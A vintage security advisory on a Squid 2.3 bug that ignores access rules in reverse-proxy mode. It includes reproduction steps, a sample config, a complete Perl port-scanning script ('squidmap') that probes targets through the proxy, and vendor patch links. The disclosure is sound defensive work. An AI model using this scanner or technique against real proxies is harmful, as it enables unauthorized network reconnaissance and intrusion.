COMMAND
Squid
SYSTEMS AFFECTED
Squid 2.3STABLE3 and 2.3STABLE4 unpatched
PROBLEM
Following is based on a Security Advisory NASR-2001-001.
Squid can be used to proxy and also portscan if set up as a httpd
accelerator (reverse proxy).
This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1 -
vendors basing their RPMS on RedHat 7.0 are advised to check and
apply the patch from the squid site. Debian uses 2.2 and 2.4 so
is unaffected.
Squid has a known bug in 2.3STABLE4 which ignores acl's in
httpd_accel mode. Note this is only if in httpd_accel_host is
set and httpd_accel_with_proxy off is set. This is not the
default configuration so it is not vulnerable without making
these configuration changes.
This enables portscanning via squid running in this mode
potentially allowing remote attackers to comprimise machines
through a squid set up this way.
Steps to Reproduce:
1. Set squid to httpd_accel mode, with a particular host and
strict acl's
2. export httpd_proxy="http://squid-server:port"
3. lynx http://victim:port/
Actual Results: You get a http 200 code if the port is open and
sometimes a response with some services SSH, SMTP, etc
Expected Results: Should be access denied (403)
Proxies have often been used in anonymizing attacks on http, but
as more sites uuse reverse proxying as a method of distributing
their network load and load balancing requests there is the
possibility that malicious users could gain proxied access or
internal information via them. Attach is a sample squid.conf and
a sample perl portmapper taking advantage of this bug. Squid
will log you running this so it isn't anonymous, and the task of
discovering accelerated sites automatically is left as an
exercise for the reader.
squid.conf:
# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>
http_port 3128
cache_mem 128 MB
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports 80
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy off
Script:
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
$|++;
require LWP::UserAgent;
use Getopt::Std;
getopts('b:P:t:L:H:',\%args);
if ($args{t} eq "") { # Specify a port for tomcat
print_help();
exit 0;
}
$low = $args{L} || 1;
$high = $args{H} || 8192;
$proxy = $args{b};
$proxy_port = $args{P} || 80;
$target = $args{t};
$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap $version scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";
# for loop hard coded - fixme
for ($port=$low;$port<=$high;$port++) {
$request = HTTP::Request->new('CONNECT', "http://$target:$port");
my $res = $ua->request($request);
my $service = getservbyport($port, tcp);
# Check the outcome of the response
if ($res->is_success) {
print "$port\topen\t\t", $service, "\t\t", $res->content, "\n";
}
}
sub print_help {
print 'Usage: squidmap <options> where options:',"\n";
print '-b host HTTP proxy via host',"\n";
print '-P ## HTTP proxy port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-t host target to attempt to scan',"\n";
}
SOLUTION
Squid are aware of this bug and have a patch on their site.
For Immunix OS:
http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/squid-2.3.STABLE4-10_StackGuard.i386.rpm
http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/squid-2.3.STABLE4-10_StackGuard.src.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/squid-2.3.STABLE4-10_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/squid-2.3.STABLE4-10_imnx.src.rpm
For Trustix Linux Security:
http://www.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/software/swup/
./1.2/SRPMS/squid-2.3.STABLE5-1tr.src.rpm
./1.2/RPMS/squid-2.3.STABLE5-1tr.i586.rpm
./1.1/SRPMS/squid-2.3.STABLE5-1tr.src.rpm
./1.1/RPMS/squid-2.3.STABLE5-1tr.i586.rpm
For Red Hat:
ftp://updates.redhat.com/7.0/en/os/SRPMS/squid-2.3.STABLE4-9.7.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/squid-2.3.STABLE4-9.7.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/squid-2.3.STABLE4-9.7.i386.rpm
For Linux Mandrake:
Linux-Mandrake 7.1: 7.1/RPMS/squid-2.3.STABLE5-1.3mdk.i586.rpm
7.1/SRPMS/squid-2.3.STABLE5-1.3mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/squid-2.3.STABLE5-1.2mdk.i586.rpm
7.2/SRPMS/squid-2.3.STABLE5-1.2mdk.src.rpm
Mandrake Linux 8.0: 8.0/RPMS/squid-2.3.STABLE5-1.1mdk.i586.rpm
8.0/SRPMS/squid-2.3.STABLE5-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/squid-2.3.STABLE5-1.3mdk.i586.rpm
1.0.1/SRPMS/squid-2.3.STABLE5-1.3mdk.src.rpm
Single Network Firewall 7.2:snf7.2/RPMS/squid-2.3.STABLE5-1.2mdk.i586.rpm
snf7.2/SRPMS/squid-2.3.STABLE5-1.2mdk.src.rpm
For Caldera Linux:
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/squid-2.4.STABLE1-7.i386.rpm
ftp://ftp.caldexra.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS/squid-2.4.STABLE1-7.src.rpm